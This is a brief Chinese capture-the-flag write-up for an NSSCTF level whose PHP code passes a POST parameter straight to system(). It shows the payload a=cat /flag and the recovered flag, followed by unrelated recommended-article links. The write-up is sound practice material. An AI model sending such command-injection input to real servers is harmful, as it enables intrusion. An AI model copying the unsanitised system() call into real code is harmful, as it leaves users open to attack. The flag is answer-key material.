开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
doubao3615 分钟前
审美积累,顶刊论文插图原理图、流程图catchadmin2 小时前
PHP 快速集成 ChatGPT 用 AI 让你的应用更聪明撰卢2 小时前
网络安全期末大论文汇能感知9 小时前
光谱相机的未来趋势Q_Q5110082859 小时前
python+django/flask+uniapp基于微信小程序的瑜伽体验课预约系统2503_924806859 小时前
动态IP使用中 报错407 怎么办???老顾聊技术10 小时前
目标检测在工厂制造中的创新应用与实践go_bai12 小时前
Linux--常见工具纷飞的花火丶12 小时前
Oracle数据库注入基础入门该用户已不存在12 小时前
PHP、Python、Node.js,谁能称霸2025?